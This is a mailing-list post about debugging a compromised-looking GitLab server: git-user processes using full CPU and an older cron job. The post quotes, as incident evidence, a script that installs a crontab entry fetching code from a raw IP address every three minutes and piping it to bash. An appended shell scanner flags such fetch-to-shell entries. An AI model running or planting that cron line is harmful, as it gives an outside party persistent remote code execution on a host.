[Adminsysters] Debug gitlab

mara mara at multiplace.org
Fri Jan 21 10:41:21 CET 2022


I SSHed in and saw the htop stats running in the session
"server". The git user was running a couple of processes with the same
weird command '7432xxxx'. See the screenshot attached. These processes
were consuming ~100% CPU.
I installed strace to see what this command is doing. During the
installation of strace, I got a message that gitlab-runsvdir.service was
running outdated libraries and needed a restart. I pressed OK, and strace
continued its installation.
After that, the above git processes were not there anymore.

Now, I don't know how this could be related to bandwidth, and if it is.
But our gitlab is running a rather old version, and it urgently needs
an upgrade, see related issue:
https://git.systerserver.net/systerserver/notes/issues/40

Also last month, while looking into crontab for our backup automation
policy, we noticed the following weird cron job running with git, every
3min ->
===
#!/bin/sh
url="http://112.51.247.232:8088/Adobe/conf"
echo "*/3 * * * * (curl -fsSL $url||wget -q -O- $url||python -c 'import 
urllib2 as fbi;print fbi.urlopen(\"$url\").read()')| bash -sh" | crontab -
===
which reads the body of the above URL and pipes it to bash. A whoseip
showed a Chinese mobile operator.
ignifugo mentioned something about a vulnerability exploit when we 
discussed it in our meetings during rc3.

Anyhow, I checked again if git is running any cronjobs, but no.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: adele-weird-git-process.png
Type: image/png
Size: 108443 bytes
Desc: not available
URL: <http://lists.genderchangers.org/pipermail/adminsysters/attachments/20220121/577997a2/attachment-0001.png>
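
An added example, not part of the original message: a shell check that flags crontab entries of the kind quoted above, where fetched content is piped into a shell, plus entries that fetch from a bare IP address. The sample crontab, its 192.0.2.x addresses and the function names are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag crontab entries that download content and pipe it to a
# shell (the pattern of the cron job quoted in the message), and entries that
# reference a URL by raw IP address. All names below are hypothetical.

# Constructed sample crontab (documentation addresses, not real indicators).
SAMPLE='# constructed sample crontab
0 2 * * * /usr/local/bin/backup.sh >/dev/null 2>&1
*/3 * * * * (curl -fsSL http://192.0.2.10:8088/x||wget -q -O- http://192.0.2.10:8088/x)| bash -sh
15 4 * * * wget -q -O /tmp/feed.xml http://192.0.2.20/feed.xml'

# Reads crontab text on stdin, prints "REASON<TAB>entry" for each suspicious line.
scan_crontab() {
    awk '
        /^[ \t]*#/ || /^[ \t]*$/ { next }   # skip comments and blank lines
        {
            fetch = ($0 ~ /(curl|wget|urlopen|urllib)/)
            pipe  = ($0 ~ /\|[ \t]*(ba|da|z|k)?sh([ \t]|$)/)
            rawip = ($0 ~ /https?:\/\/[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+/)
            if (fetch && pipe) print "FETCH_PIPE_SHELL\t" $0
            else if (rawip)    print "RAW_IP_URL\t" $0
        }'
}

# Number of flagged entries in the crontab text on stdin.
count_hits() {
    scan_crontab | wc -l | tr -d ' '
}

# Audit the crontab of every local account (run as root to read other users).
audit_all_users() {
    cut -d: -f1 /etc/passwd | while read -r u; do
        crontab -l -u "$u" 2>/dev/null | scan_crontab |
            awk -v u="$u" '{ print u "\t" $0 }'
    done
}

# Demonstration on the constructed sample.
printf '%s\n' "$SAMPLE" | scan_crontab
```

Per-user crontabs are only one place such an entry can live; /etc/crontab and /etc/cron.d/ can be fed to scan_crontab on stdin in the same way.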

